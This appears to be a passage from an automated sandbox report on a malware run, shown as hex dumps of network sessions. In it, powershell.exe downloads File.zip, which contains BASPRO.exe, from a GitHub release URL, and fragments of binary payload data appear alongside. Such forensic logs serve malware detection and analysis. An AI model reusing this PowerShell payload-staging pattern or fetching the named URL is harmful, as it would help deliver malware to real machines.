88 c7 cb 59 36 4d 37 13 f8 fd b0 27 f3 c1 e1 1b f0 d2 b0 68 2b ef 29 69 b7 eb ff 99 6d 7c f0 f3 c1 e1 1b dd 21 25 f6 e2 3e da 9e 18 94 e7 Data Ascii: /\|mhYk,)2S@vF(B9~ IyDYdY{oru%j='$i&z9D-)8(4&#:b,aTf>5_YM,a9K7&Z.AM,amtSa^(M=4Inaxd+Y6M7'h+)im\|!%>
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 43 72 5d 29 40 e5 7c bf 27 9b 5a ff 0f 96 41 f2 53 80 0d 5e 19 7d 18 76 e1 93 22 c4 0d e8 5f 12 05 51 32 d9 8d 4c 0c 0c 68 8e d7 bd f5 89 01 f6 54 24 00 68 1b 04 09 16 8d 64 24 14 e9 44 58 07 00 4d 8b 0e e9 61 37 41 00 8d 64 24 0c e9 b9 8d 08 00 bd 8e aa 3e a1 c1 e5 03 0f bf cd 8b 94 ef 80 5c 55 b0 0f 8a 6b dd 08 00 8d 84 49 83 42 b9 a0 0f 87 96 81 3f 00 8d bc ef 84 5c 55 b0 8d b5 03 91 bf a0 8b f2 66 81 c5 87 96 99 0f 8c f4 c2 04 00 b8 a2 c5 24 0f e9 41 92 11 00 68 87 92 9c 86 66 d1 c2 e9 6e 1d 3e 00 be bb 01 2f ff e8 42 a2 01 00 b8 86 43 ac 4f 66 c1 e0 47 8b 84 05 00 3d 53 b0 0f 8a 2a b2 0c 00 68 2a 07 35 6f 48 8d 64 24 18 e9 a6 c8 3a 00 32 d8 f6 54 24 13 81 ee 02 00 00 00 e8 25 c9 39 00 e8 db 7f 01 00 66 f7 d2 e9 75 a4 4a 00 89 94 0c b3 4e 48 be 51 f7 Data Ascii: Cr])@\|'ZAS^}v"_Q2LhT$hd$DXMa7Ad$>\UkIB?\Uf$Ahfn>/BCOfG=Sh5oHd$:2T$%9fuJNHQ
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 64 34 ab 02 47 a0 bd fc bc 30 52 5b 5f 51 0a 01 41 e2 da 76 e8 1e 78 5c 82 48 cc 82 1e 53 09 ee 46 44 2a 71 e3 09 41 c7 44 24 00 66 b0 0d b6 e8 6e 47 0b 00 b8 ab dd 05 da 8b 14 27 0f ab c0 66 c1 c8 e1 c0 c8 47 8b 44 27 04 0f 82 ba ad 45 00 4d 8b 17 49 81 c7 08 00 00 00 4d 33 d3 e8 fb 41 08 00 c7 44 24 00 ee 63 7f 53 e8 ef 7f 0a 00 b8 34 6e 12 f9 0f ba f0 00 66 d1 c3 f7 d8 48 c1 c0 31 0d 26 c3 9b 1b 66 f7 db 0f ba e0 bc 66 d1 cb 66 0f af c0 48 f7 d8 e8 2c f3 3b 00 ba 2d 87 b3 32 0f be c2 66 8b 44 38 d3 c0 e2 62 33 d2 fe c2 8d 3c 57 e8 da 6a 49 00 68 2e 0e 18 ba e8 52 71 0a 00 e8 e2 88 01 00 8d 64 24 0c e9 0e 56 0d 00 89 56 00 8d 64 24 0c e9 02 56 0d 00 0b c1 89 44 25 00 e9 ff 4c 0d 00 b9 06 a3 34 70 8b 84 0f fa 5c cb 8f c0 f1 45 66 33 c9 8b 8c 39 04 00 cc Data Ascii: d4G0R[_QAvx\HSFD*qAD$fnG'fGD'EMIM3AD$cS4nfH1&fffH,;-2fD8b3<WjIh.Rqd$VVd$VD%L4p\Ef39
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 42 07 3a f5 3e 02 a4 49 85 4a 63 6d 78 60 fa f7 78 84 2b c0 6d 9a af c1 f4 97 97 e0 26 d5 11 e1 0a 6f 14 55 75 26 84 b1 d5 77 b9 76 5a 0c 3c 84 97 a2 88 11 d5 f2 39 7e 9c 88 42 d8 a5 b4 3f 24 d8 c8 13 68 a4 5f e3 e6 b7 b5 6e c2 e6 3c 80 90 d2 c9 5d e6 53 76 cc 80 e7 f4 de 84 b9 f8 0f 8a 13 91 46 00 0f 82 cc ff 0b 00 66 0f b6 14 21 68 88 72 94 17 81 dd 01 00 00 00 66 89 54 25 00 68 90 a1 0b 2b 8d 64 24 08 e9 b3 7c 39 00 03 01 55 f0 cd 5f 0b fe 43 91 45 10 6d d7 c3 ee d3 59 0d 80 6e d6 a7 23 d9 cd d8 a5 cf db 16 0c af a6 6e 34 d8 f8 25 d8 f5 02 3c c2 0b 78 26 17 00 00 00 00 89 e3 81 7a 62 da cf b2 90 7c 41 00 a2 a5 8c e1 f9 af 38 00 00 00 00 2f 9b 9f d3 2d 1e e5 94 45 18 25 0a 0e 56 c0 ea b0 27 00 00 00 00 4e 24 0f 0c 2a 93 95 6c 68 7b 65 ef f4 8f 22 d7 00 Data Ascii: B:>IJcmx`x+m&oUu&wvZ<9~B?$h_n<]SvFf!hrfT%h+d$\|9U_CEmYn#n4%<x&zb\|A8/-E%V'N$*lh{e"
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 19 e2 99 bc bc e1 5f 58 1c 3c 87 66 08 dc 18 89 fc 96 42 35 6b c1 23 e2 a0 cc 3b 0e f1 6b d2 00 5a ae be 5d c7 8b 43 b5 79 49 73 09 9d 4d 7f 05 00 fa 7e 42 3a a9 d2 4e 9e 15 9a ca 6b e7 d9 0c 71 2b ff c2 ff 15 01 f4 49 23 37 7a 07 4d 99 54 29 93 87 aa 97 45 91 0c 43 1b e6 da c0 94 e9 a2 74 36 2f ef 03 80 00 00 c9 07 3f d2 a1 f8 ff ff ff eb bf 80 ef 07 44 40 d4 81 2c 57 ed 4e c5 09 39 5b c0 9c 81 82 6e 5e 74 2e 13 02 40 da 06 56 c5 be e3 b2 c0 ba ff ce 3d 46 4b 7a d9 82 26 dd 49 80 86 c2 81 58 3a f8 2c 41 fc 4e 5a 4f 55 fe e7 17 2d 39 cc 71 93 dc 86 e6 34 a1 dc 8e 5a 07 7a a8 86 46 e7 82 cf b2 30 64 59 bc 2c af c6 44 cf c4 a3 06 b5 c0 0f 01 f6 60 76 b9 f3 e3 f9 ab 66 b2 ec 28 0c 78 df 7e 87 54 2f 2a 1b 98 02 6e b0 90 64 74 87 fc 89 98 a2 19 4d b0 43 66 57 Data Ascii: _X<fB5k#;kZ]CyIsM~B:Nkq+I#7zMT)ECt6/?D@,WN9[n^t.@V=FKz&IX:,ANZOU-9q4ZzF0dY,D`vf(x~T/*ndtMCfW
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 05 1f 1e 1e 71 76 12 3e 75 99 83 8c e3 70 44 dc 2f 95 d4 05 1f a6 ef 80 90 54 7a 48 92 88 61 f6 c5 ba 14 12 d7 64 35 3e 46 03 a2 11 3c 65 0a 19 e0 d7 08 e4 3c 54 f7 39 76 c3 e7 9a e5 2e b4 be 35 77 06 61 a4 f5 94 49 c6 8e 86 13 ad 21 aa c2 e0 43 24 af 8f ee a9 42 7a 13 02 e3 3d ae e5 0a 3c 57 3c e4 18 c9 ee 43 9b 9b 21 9a 8d 75 a3 e9 46 f7 80 7d dd 0d c6 d6 de a1 98 05 00 d8 9c 22 ae 8a 37 c2 42 7b 04 b9 23 e0 9d b9 c4 bd 04 14 25 48 fd b7 88 e9 58 70 69 1c 81 99 90 f7 2b 7d 25 03 51 ea 43 20 3d 0d ed c7 7c 6b 83 4d 27 b8 a1 c4 d2 d0 90 d2 c0 f2 e9 92 47 78 32 3c 59 77 1c 0d 03 36 f3 de 94 ab 2e 63 25 1e 7f ce ee 8f fe 3f 31 12 71 c6 d4 e3 9c f5 b8 b4 b4 2b 60 66 c1 f8 21 66 0f ab c0 8b 84 06 a6 21 d4 9f b9 3f 6c 14 ca 66 8b 0c 20 68 03 34 15 2f 66 c1 6c Data Ascii: qv>upD/TzHad5>F<e<T9v.5waI!C$Bz=<W<C!uF}"7B{#%HXpi+}%QC =\|kM'Gx2<Yw6.c%?1q+`f!f!?lf h4/fl
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 48 87 47 00 0f 85 2f 0e 0c 00 68 86 7d 3c 8d be 81 06 25 9f 8b 4c 25 00 e8 e6 30 49 00 e8 3a 4c 03 00 0f 05 e8 b6 bb 48 00 e8 40 44 11 00 31 87 67 1d 78 c5 6f 7b be c3 41 1b b8 66 10 fd 72 2e 67 48 f2 66 5a 85 67 1a 40 66 9b 69 7d 88 35 5f 4b 66 5b 61 75 b8 e4 b0 dd c4 49 1e 67 7c f3 c9 75 d1 8e ed c3 31 06 1a a3 2f a4 4f 9e 96 02 92 e6 e4 ff c0 f8 24 33 e5 0e b2 85 36 3b 5c bd b7 8c c0 c7 08 ff ca 82 67 58 8d be de 08 ea 36 3b 5c bd b7 10 9c 7d 9a 78 43 aa 3c de 2b cd 4a 56 0a 5f 33 54 bc 62 c1 f4 7c 25 87 2f 34 c9 77 99 d1 dd 33 7f 5a 1f f7 b4 c7 9d 8b b0 b2 d9 1b 90 f9 db eb 77 7f ce 2a 5b 84 67 c8 54 4a 98 c9 d9 29 bd 31 bd 27 ea 3e 3e e5 bf 60 11 d1 56 4d d3 33 b8 f1 45 d1 0d 36 68 80 c3 d5 01 10 13 a9 ef 72 b2 ce bc ba 50 57 98 c9 d9 29 04 48 cf 07 Data Ascii: HG/h}<%L%0I:LH@D1gxo{Afr.gHfZg@fi}5_Kf[auIg\|u1/O$36;\gX6;\}xC<+JV_3Tb\|%/4w3Zw*[gTJ)1'>>`VM3E6hrPW)H
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 05 23 79 cf e5 f3 07 86 6a 53 2c e5 ca 15 cf 88 44 c8 c7 f4 a7 35 c0 82 d8 4b b4 0a 55 6a 2b 48 35 44 17 46 54 ac 56 79 f0 e3 41 4b a4 f2 9e 40 7b f6 57 35 f6 5f 0e 2c 8d 91 82 b6 fd 9b dd 79 c4 f9 ad f9 ad ad 18 5f 7d 1b 99 8a e7 ed e9 f3 82 8f f7 82 37 b6 06 ed 88 02 17 aa 3c 92 92 58 95 53 80 1e 39 04 83 58 25 cb 8e 9c c6 bc 4b f5 43 0f 26 54 24 11 70 2a 3b 4c 26 a9 5d 44 cb ae 24 70 9d 90 26 90 e4 17 5a 1b 62 53 1d 46 2a a7 db 36 e4 2d c8 43 1a 1f 4d 32 52 8d 64 24 04 e9 4b 3a 09 00 0f 34 e8 6c 02 39 00 e8 e0 8f 07 00 0f 85 88 1e 0d 00 8b 44 25 00 e9 ef dd 43 00 ba 04 99 15 64 e8 aa 51 0f 00 59 81 c1 12 75 04 00 ff e1 b8 1b b0 92 f6 8b 04 26 68 a8 e7 82 6e 8a 4e 04 f7 54 24 00 68 a4 eb b5 22 81 c6 06 00 00 00 36 88 08 e8 8f ec 07 00 66 45 33 e3 48 c7 Data Ascii: #yjS,D5KUj+H5DFTVyAK@{W5_,y_}7<XS9X%KC&T$p;L&]D$p&ZbSF6-CM2Rd$K:4l9D%CdQYu&hnNT$h"6fE3H
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 14 e8 80 da ad c1 74 24 14 d9 32 da e8 69 67 07 00 8b 8c 0e 48 94 c6 df e8 ab d5 fe ff 68 02 5e b5 e8 e8 70 5c fe ff e9 58 c1 0e 00 89 5f 08 68 0e d9 90 7c 89 4f 04 e8 c6 5e 06 00 8b 6c 25 00 e8 e8 b7 11 00 8d 64 24 08 e9 9d 13 3f 00 00 00 00 b6 c0 33 4d 20 f0 34 3a 9a a1 3d a3 0c 91 3a d4 af 04 5e 4a 39 34 59 3d 83 65 50 a4 15 55 57 d3 84 48 e8 43 12 78 ef 34 a8 29 e6 ad 3e 19 e1 da 9d 8c 85 44 0b bc 82 33 b1 ed 8b aa 27 dd 8c dd d2 d0 84 50 44 e0 83 27 fe b1 8a be 68 81 8d c9 cb 14 e9 57 5d 24 ee 20 e7 75 e7 b9 71 45 e0 ce e0 58 5f 5e 76 68 58 29 cc 39 51 b0 5a 09 56 c7 f9 9c 32 59 6f ac 35 2e d5 fd 3c b7 43 cd 3b c0 7e e0 5d 76 e8 d0 5a 01 52 81 53 98 c4 b1 54 ef 67 24 30 71 f1 14 37 06 4b 45 3e 9f dd 75 39 e8 4c 68 86 78 da 58 81 0f 60 09 88 96 f6 39 Data Ascii: t$2igHh^p\X_h\|O^l%d$?3M 4:=:^J94Y=ePUWHCx4)>D3'PD'hW]$ uqEX_^vhX)9QZV2Yo5.<C;~]vZRSTg$0q7KE>u9LhxX`9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49748	140.82.121.3	443	5044	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:29 UTC	207	OUT	GET /frielandrews892/File/releases/download/File/File.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2024-06-23 22:10:30 UTC	993	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sun, 23 Jun 2024 22:10:29 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221029Z&X-Amz-Expires=300&X-Amz-Signature=af2e0f4cdd3db0a9b9d73ae7a4618c6cf1459a9d98ec9620de05c094591202f1&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-06-23 22:10:30 UTC	3031	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49752	185.199.111.133	443	5044	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:30 UTC	679	OUT	GET /github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221029Z&X-Amz-Expires=300&X-Amz-Signature=af2e0f4cdd3db0a9b9d73ae7a4618c6cf1459a9d98ec9620de05c094591202f1&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-06-23 22:10:30 UTC	775	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17056614 Content-Type: application/octet-stream Last-Modified: Sat, 15 Jun 2024 00:49:00 GMT ETag: "0x8DC8CD4F1FDDA6A" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: bc1792bb-901e-005a-741c-c187b2000000 x-ms-version: 2020-10-02 x-ms-creation-time: Sat, 15 Jun 2024 00:49:00 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=File.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 0 Date: Sun, 23 Jun 2024 22:10:30 GMT X-Served-By: cache-iad-kcgs7200033-IAD, cache-nyc-kteb1890042-NYC X-Cache: HIT, MISS X-Cache-Hits: 1297, 0 X-Timer: S1719180631.588930,VS0,VE40
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: 50 4b 03 04 0a 00 00 00 00 00 ec 2d cf 58 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 46 69 6c 65 2f 50 4b 03 04 14 00 00 00 08 00 da 2d cf 58 96 56 67 ca 8a d4 01 00 00 0e 05 00 0f 00 00 00 46 69 6c 65 2f 42 41 53 50 52 4f 2e 65 78 65 ec 7c 0f 7c 54 d5 99 e8 9d c9 cd 70 81 21 33 c8 0c 8e 75 b0 a3 5c 31 9a 01 47 19 da e0 84 3a 89 49 08 25 c0 0d 09 99 58 c2 9f b6 d8 9d ce 52 45 b8 a3 f4 89 88 9d a4 65 38 dc 96 b7 eb db d5 57 7f 7d b6 75 bb fe ba 76 97 fe ea ee d2 3f cf 26 04 93 28 18 54 14 b0 ba d6 6d 6d f7 d2 e0 1a 04 31 48 e4 be ef 3b e7 dc 7f 93 20 f6 ed eb be df fb fd 5e fc c9 dc 73 ee 77 be f3 9d ef 7c ff ce 77 ce b9 cb 3e b7 47 28 13 04 41 84 ff 0d 43 10 f6 09 ec 2f 2d 5c fa 2f e2 11 84 8a 4f fe ac 42 78 6a f2 f3 57 ef f3 34 3f 7f 75 5b f6 cb 5b Data Ascii: PK-XFile/PK-XVgFile/BASPRO.exe\|\|Tp!3u\1G:I%XREe8W}uv?&(Tmm1H; ^sw\|w>G(AC/-\/OBxjW4?u[[
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: df 0d 59 2c 84 96 9b 03 c4 d7 2f 56 43 b3 75 ac 1d e9 c7 a2 45 96 3d 7e 90 4f 98 85 0c 59 1e 2a 9c 0b 6e 16 89 6f d8 4b fa 53 c7 37 37 b0 e2 4c 28 1e 25 8d c1 b2 fd a9 be 7b 6e c2 ba 99 86 2a 07 89 8f 0c 55 1d 6f 6d d7 51 dc d6 ae 06 f6 d3 da 7e 5e fb 3d b3 36 43 b6 c9 a1 89 79 70 05 f0 80 0c 65 f4 b3 63 94 0b 9d 74 f4 95 d0 ff 1c 18 fd bb 7c f4 d3 ac d1 23 36 1c 0d 1d 3b 3e 42 9b a9 99 56 45 3f f9 bc 6b e0 15 f6 c0 59 13 73 dc ab a9 8c 38 ff da 89 2a fb db 8d 70 75 8c 5a a9 ee 1e 10 20 a9 98 50 a7 0e a4 45 01 ac e6 5a 68 01 8f 12 7f a4 f2 45 da 00 24 58 6c 12 11 37 94 53 4d 62 7e 1a 11 52 d0 32 5f be d7 03 b5 37 f7 98 1d 11 8f d6 26 8f 16 4e 4a c0 1b ff 4a 43 f1 43 e3 20 69 12 53 9f 15 f3 15 d0 c6 9b 97 f6 7a 0a 07 24 da 88 fd 96 d0 77 0a cc 8b 94 21 db Data Ascii: Y,/VCuE=~OYnoKS77L(%{nUomQ~^=6Cypect\|#6;>BVE?kYs8*puZ PEZhE$Xl7SMb~R2_7&NJJCC iSz$w!
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: b1 9a 38 17 17 66 09 07 11 5f 3f d9 cd 04 d1 5c d5 ae 7e f0 00 96 fb 0e 41 d4 29 b6 b6 93 57 77 79 b5 cd 62 a6 5d 5b 2a ee 2c 63 01 89 d6 08 64 2f 85 8e 54 9c e2 46 f0 a3 4b fd e6 1b 3f 14 82 ac b0 6e 2d e9 5b 6d af bf d8 fa 77 d3 bb 8e 90 48 fa 88 f5 ef 49 72 bf 44 02 c5 0a e2 81 25 5e 10 93 14 8d fb 30 79 38 12 e8 f5 0c a7 8c bb a9 f2 bd 80 e2 11 20 33 f9 82 97 d4 4a 9a ff 41 52 e7 2f f4 88 85 de 60 0b 19 d2 c4 af 29 a4 4e 82 32 3e e9 d9 5b 70 75 31 7e 3d 29 c2 3a f8 a4 91 b0 52 18 28 7c 7a be d7 63 d2 6e d3 bf e7 ff 2a fd 3b ff 18 fa ff b1 67 02 fa f7 fe bf c3 ff f7 7e e9 11 4a ec e9 69 47 3e c9 19 4c 07 1d 09 25 3f b8 92 98 fe 06 f4 a4 2d c7 70 3f 82 6f 06 7c 9d f1 3a 81 05 da da f2 90 f9 10 31 1f 40 c1 37 a2 30 2f af 64 35 df dd 2a d7 09 c5 c6 f8 77 Data Ascii: 8f_?\~A)Wwyb][,cd/TFK?n-[mwHIrD%^0y8 3JAR/`)N2>[pu1~=):R(\|zcn;g~JiG>L%?-p?o\|:1@70/d5*w
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: ea 45 55 10 de 3d 20 f6 2f f6 0b 3b 1e f0 0b 6a 00 17 ab e4 20 a6 d8 80 4f c3 53 6c 9b a0 80 e9 b7 f2 28 51 2e 9a 07 8d b0 7c 1d 7d 97 d0 2f fb c0 30 70 a9 33 cf b4 1f 9b 50 eb 99 f9 68 43 9a a9 b9 a4 b8 1f 9f 53 47 4b 68 1f 3a 3c 50 b1 91 12 2a f1 f4 69 5b 99 65 32 10 a2 4d e4 45 9e 33 4c e8 7f fb 2e c8 1e 2c 4c 49 2d f5 06 a1 07 8b 6d 72 82 d4 a2 93 80 ce aa 71 c1 a1 89 0f 16 21 f2 05 a9 9a 83 b9 70 0c 8d c8 dc 17 e6 d0 44 54 5b 79 ea 05 75 c5 4a 4a e5 d1 c2 36 b9 9a 56 fa d4 2b c8 0a c9 78 05 87 d7 42 06 49 d0 58 99 44 6c 02 cb 05 44 69 43 e3 08 2c 70 13 85 fd 62 41 85 7e b0 5b d5 07 8e 2c 39 fc 23 b2 51 8e 53 62 c1 30 80 04 46 50 02 97 33 1b d3 20 30 21 bc 15 61 30 80 73 46 6f 22 7d 2e 7b 06 f3 12 a9 7e 75 3a 19 65 21 dc 91 d4 fb f9 f7 d0 08 d9 51 1c Data Ascii: EU= /;j OSl(Q.\|}/0p3PhCSGKh:<P*i[e2ME3L.,LI-mrq!pDT[yuJJ6V+xBIXDlDiC,pbA~[,9#QSb0FP3 0!a0sFo"}.{~u:e!Q
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: 7b 52 1b 75 64 63 a8 7c f9 ce 39 f6 d3 ba 70 3f cd 29 62 6c 13 85 49 d9 fc b7 51 f3 8a 2c 92 6b 16 ac c5 70 9b b5 40 ee b0 ea 3a ad a7 9a 01 b6 95 84 a3 b5 2a d3 56 93 7a ab ae 89 3d f1 7d b4 49 d9 37 e7 d2 ad b3 27 cc ad 33 7a ce 80 fc 42 7e 52 10 cc 53 18 e4 30 07 80 39 7f cc b4 00 ac 3b ef ae e3 cc 77 77 bd 16 e8 fa 15 58 f3 0c 6e f0 30 7e ad 32 4f 7d 3c 81 5b 6d 74 d3 2b 6b 77 b8 17 f7 bd cc bd ba 6a 7a 48 62 03 df c2 f3 f1 63 06 d4 21 e1 69 10 96 36 41 d5 50 8c 63 7c d7 09 7b b7 a3 8a f5 bc 86 e7 92 72 1e 6a d3 cc f1 ac cf 79 30 87 90 e5 b4 d0 73 18 71 16 c1 84 9f 98 ed 42 c0 8f 6e 12 64 42 93 a4 89 3b 0b 3d 54 45 b9 0c d8 2b 67 84 e0 6d a6 92 26 3f 51 a4 aa e7 0a e7 3c db 2f d3 c4 3d 85 9e 10 02 02 b1 27 72 30 21 39 31 7b d2 41 4d 84 cc 7d 9c af 4a Data Ascii: {Rudc\|9p?)blIQ,kp@:*Vz=}I7'3zB~RS09;wwXn0~2O}<[mt+kwjzHbc!i6APc\|{rjy0sqBndB;=TE+gm&?Q</='r0!91{AM}J
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: 31 9b d5 ec 19 17 7d 1d fd 53 46 5e cf 8b b8 da 72 04 48 37 8e 0b 90 e6 8d 0b 90 e6 5e 34 40 02 1a d0 5a 23 b1 3c c4 be d9 b9 3d d9 c1 c1 6f b2 6a da 78 4d c2 42 a9 98 56 87 1b ce 01 50 eb 87 71 85 e8 58 f4 3e 78 00 d5 93 66 3a 40 dc f6 9f 73 e4 2f 92 25 f9 8b a6 4b e4 9f 3b 4a f3 cf 89 f1 f9 e7 36 57 fe 19 97 cf 8a 9d 7f 96 4b f3 cf 95 98 b7 b7 f3 cf f2 b8 fc 73 b2 34 ff 9c 60 f9 e7 b6 92 fc 73 87 2b ff dc 41 55 11 ba f6 31 59 b0 f3 cf 1d 76 fe 99 01 58 bc c4 d3 d6 8a bd 52 c4 eb 73 8a 9d 7f c6 e3 e7 8a 9d 7f ee a0 f9 e7 e8 34 c6 96 ff a4 fc f3 9d a4 d1 af 2d f7 17 b6 8a 82 ba 94 c6 22 3c 11 4d 49 9f 28 11 dd 61 27 a2 19 cc b8 f1 5c 24 11 7d 33 4d 44 27 0d 55 5e 4f 3c 86 12 87 87 4e 9a 58 92 15 32 44 66 1a 2b e3 d8 83 95 36 e0 9b f2 d9 1d 7c 3f 0d 27 08 Data Ascii: 1}SF^rH7^4@Z#<=ojxMBVPqX>xf:@s/%K;J6WKs4`s+AU1YvXRs4-"<MI(a'\$}3MD'U^O<NX2Df+6\|?'
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: 16 1e 65 eb 14 19 13 2a 3c 29 11 83 50 91 ad dc 2b 69 11 85 09 4d 9e 2a e6 ca 86 bd 10 6e 86 77 cf a9 33 33 ae 3b e0 b1 9d 3d 6e 83 47 70 7e 71 56 da c9 4a 09 56 ea c2 69 5e ca 82 46 23 fc 32 9f 28 f3 48 1f c4 b6 73 4a 8f ed d1 13 90 21 01 0d 19 df 16 1a e5 32 18 41 08 5e 37 62 6f 1b 65 da 73 82 92 f3 72 6f 8d c7 54 1f b2 3a ad 54 f8 01 e8 97 ed 45 56 c4 cb ba e5 22 10 f1 b8 02 87 88 bd ac 4c d8 64 9e b9 e6 22 64 ba e7 a3 c6 9a 8f 76 72 2a 5b 83 e1 eb f2 60 7f 23 06 4c 3d 3c 6a 5f 6b ac ef 84 f7 bb 6a fd ae fd cc 76 c7 61 d7 25 20 59 0d 99 ff 03 a7 5d d7 91 99 6b 49 5d 84 7c 56 c4 eb 25 4d 0b a7 d3 ed ea ee 9e fc 19 4a 2e de 08 a1 df 35 98 5c 94 4a 25 ac 75 15 39 91 13 69 dc 3a 46 43 88 ee d7 d4 2c 00 47 b4 a5 52 7b 06 e6 37 42 84 62 19 56 14 6f 13 f9 66 Data Ascii: e<)P+iMnw33;=nGp~qVJVi^F#2(HsJ!2A^7boesroT:TEV"Ld"dvr*[`#L=<j_kjva% Y]kI]\|V%MJ.5\J%u9i:FC,GR{7BbVof
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: 87 b0 24 3c 80 ef 62 48 b4 fd 45 06 c0 e4 43 fc c3 4f c1 bf 11 97 0e b8 af e7 72 79 87 e1 e1 35 1e e3 28 e3 5d 05 ad a4 d8 76 b0 69 c1 eb df 21 f3 f5 5c ac 20 94 3e fe 5a fa 88 d6 ee 0b bc 28 75 e4 05 14 aa aa 17 5b 7b 3f f0 b6 67 0a 1f 54 06 be f9 34 63 4a 54 ab f3 3c 52 f8 cd a4 b2 fd bd a3 65 20 d0 2f 6b c9 67 90 f4 b2 21 2d da 8d 0f 2d c5 29 04 71 44 cb fa 5a 8a 1e fa 18 03 46 7c 0a 67 85 7e 62 26 58 d6 87 8a 60 bd 34 1f e4 aa 3e 80 ab 60 70 95 00 e7 84 82 97 e6 63 65 55 3f c0 fd fe 82 05 57 35 31 be 58 19 e2 7b fa 02 4e 40 10 bf cd 88 ce 6b 42 40 00 fb 6b 1b 8c 86 04 d4 34 84 b4 c5 06 9f f8 85 60 24 ee 4f a1 d5 90 51 a5 5b 35 71 af 2d c7 e3 6c 83 d6 68 90 0b 76 cb e8 b6 83 6b 00 26 d8 6a 01 60 3f 0e 7e 4b d4 66 17 7d 0e 65 57 17 20 05 a8 7f 8a 71 8c Data Ascii: $<bHECOry5(]vi!\ >Z(u[{?gT4cJT<Re /kg!--)qDZF\|g~b&X`4>`pceU?W51X{N@kB@k4`$OQ[5q-lhvk&j`?~Kf}eW q
